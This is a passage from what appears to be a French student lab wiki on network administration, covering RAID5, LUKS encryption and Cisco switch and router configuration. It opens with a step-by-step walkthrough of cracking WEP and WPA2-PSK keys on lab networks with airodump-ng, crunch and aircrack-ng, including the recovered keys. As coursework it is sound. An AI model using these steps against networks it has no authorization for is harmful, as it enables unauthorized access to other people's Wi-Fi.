   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Diverses commandes ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. &lt;br /&gt;
La manipulation des disques dur restera toujours une opération délicate demandant un maximum d'attention et ne devant pas se faire à la va-vite. Rien de mieux qu'un bon dimanche pluvieux pour s'aventurer dans ces contrées. Ne jamais oublier que les erreurs de manipulation sur les disques sont souvent irréversibles. Vous l'aurez compris, je vous dis tout ça afin de vous désigner comme seul responsable en cas de problèmes qui pourraient survenir sur votre matériel.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `/etc/fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
En retirant un disque (mise en commentaire /etc/fstab), le disque md0 est toujours actif et utilisable.&lt;br /&gt;
&lt;br /&gt;
=== Cryptage de données ===&lt;br /&gt;
Le cryptage des données s'effectue grâce à l'utilitaire [https://doc.ubuntu-fr.org/cryptsetup cryptsetup]. &lt;br /&gt;
==== Remettre à zero la clef USB ====&lt;br /&gt;
Pour se faire, on commence par chercher le nom de la clef USB cible dans le gestionnaire :&lt;br /&gt;
      lsblk&lt;br /&gt;
Dans notre cas,le périphérique cible est nommé '''sda''' (il peut aussi s'appeler sdb ,sdc ...)&lt;br /&gt;
On va acceder aux partitions via :&lt;br /&gt;
      fdisk /dev/sda&lt;br /&gt;
Le menu suivant apparait alors :&lt;br /&gt;
   Welcome to fdisk (util-linux 2.25.2).&lt;br /&gt;
   Changes will remain in memory only, until you decide to write them.&lt;br /&gt;
   Be careful before using the write command.&lt;br /&gt;
   Command (m for help):&lt;br /&gt;
On va d'abord nettoyer la clef avant d'y crypter nos données, pour cela on entre le choix 'd' et on supprime les partitions existantes.&lt;br /&gt;
&lt;br /&gt;
Puis pour créer une nouvelle partition on entre le choix 'n' puis 'p' qui correspond à :&lt;br /&gt;
'''n''' nouvelle partition&lt;br /&gt;
'''p''' partition primaire&lt;br /&gt;
&lt;br /&gt;
Command (m for help): n&lt;br /&gt;
Partition type&lt;br /&gt;
   p   primary (0 primary, 0 extended, 4 free)&lt;br /&gt;
   e   extended (container for logical partitions)&lt;br /&gt;
Select (default p):&lt;br /&gt;
&lt;br /&gt;
Using default response p.&lt;br /&gt;
Partition number (1-4, default 1): '''1'''&lt;br /&gt;
First sector (1-1953525167, default 2048):'''1'''&lt;br /&gt;
Last sector, +sectors or +size{K,M,G,T,P} (2048-1953525167, default 1953525167):&lt;br /&gt;
Created a new partition 1 of type 'Linux' and of size 7.1GiB.&lt;br /&gt;
&lt;br /&gt;
Puis on sauvegarde : &lt;br /&gt;
&lt;br /&gt;
Command (m for help): w&lt;br /&gt;
The partition table has been altered.&lt;br /&gt;
Calling ioctl() to re-read partition table.&lt;br /&gt;
Syncing disks.&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de la Clef ====&lt;br /&gt;
La clef est prête, on peut desormais crypter et l'utiliser avec l'utilitaire cyptsetup.&lt;br /&gt;
Pour créer le cryptage au format Luks :&lt;br /&gt;
    cryptsetup luksFormat -c aes -h sha256 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
==== Accès à la partition cryptée ====&lt;br /&gt;
Maintenant que la clef est cryptée, on peut l'utiliser. Pour commencer, on va monter le répertoire pour pouvoir l'ouvrir. Commencez par créer un repertoire '''/mnt/clef_usb_cryptee''' puis taper la suite de commande :&lt;br /&gt;
    cryptsetup open --type luks /dev/sdb home -- ouverture de la clef&lt;br /&gt;
    mkfs.ext4 /dev/mapper/home -- Système de fichier relié &lt;br /&gt;
    mount -t ext4 /dev/mapper/home /mnt/clef_usb_cryptee&lt;br /&gt;
&lt;br /&gt;
On peut maintenant acceder au contenu de la clef et le modifier via le dossier '''/mnt/clef_usb_cryptee'''&lt;br /&gt;
&lt;br /&gt;
==== Debrancher la partition cryptée ====&lt;br /&gt;
Pour débrancher la clef, il faut au préalable démonter la partition et refermer l'utilitaire via les commandes:&lt;br /&gt;
  umount /mnt/clef_usb_cryptee -- Demonter le repertoire&lt;br /&gt;
  cryptsetup close --type luks home&lt;br /&gt;
Et voila, vous pouvez désormais retirer la clef.&lt;br /&gt;
&lt;br /&gt;
=== Réseau WPA2-EAK ===&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Bridge Cordouan ===&lt;br /&gt;
&lt;br /&gt;
Nous avons due modifier le bridge de cordouan afin de relier les 2 ports ethernets ensemble&lt;br /&gt;
&lt;br /&gt;
nano /ect/network/interfaces&lt;br /&gt;
    &lt;br /&gt;
    # Bridge for IMA2a5&lt;br /&gt;
    &lt;br /&gt;
    auto eth1 &lt;br /&gt;
    auto eth4&lt;br /&gt;
    iface eth1 inet manual&lt;br /&gt;
        post-up ifconfig $IFACE up&lt;br /&gt;
        post-down ifconfig $IFACE down&lt;br /&gt;
    iface eth4 inet manual&lt;br /&gt;
        post-up ifconfig $IFACE up&lt;br /&gt;
        post-down ifconfig $IFACE down&lt;br /&gt;
      &lt;br /&gt;
    auto IMA2a5&lt;br /&gt;
    iface IMA2a5 inet manual&lt;br /&gt;
      bridge_ports eth1 eth4&lt;br /&gt;
&lt;br /&gt;
Puis on réveille les ports à l'aide de Ifdown et Ifup&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur ====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre routeur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   ipv6 unicast-routing&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.254 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 2 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 2 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 42 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour SR32 =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan130 //Autoriser le vlan 130 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour les commutateurs =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
